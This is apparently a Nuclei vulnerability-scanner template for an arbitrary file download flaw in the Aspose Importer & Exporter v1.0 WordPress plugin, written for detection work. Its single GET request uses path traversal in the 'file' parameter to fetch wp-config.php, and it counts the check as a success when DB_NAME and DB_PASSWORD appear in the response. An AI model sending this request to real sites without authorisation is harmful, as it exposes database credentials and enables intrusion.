id: aspose-ie-file-download
info:
  name: Wordpress Aspose Importer & Exporter v1.0 Plugin File Download
  author: 0x_Akoko
  severity: high
  description: The Aspose importer and Exporter WordPress plugin is affected by an Arbitrary File Download security vulnerability.
  reference:
    - https://packetstormsecurity.com/files/131162/
    - https://wordpress.org/plugins/aspose-importer-exporter
  tags: wordpress,wp-plugin,lfi,aspose
requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php'
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        part: body
        condition: and
      - type: status
        status:
          - 200
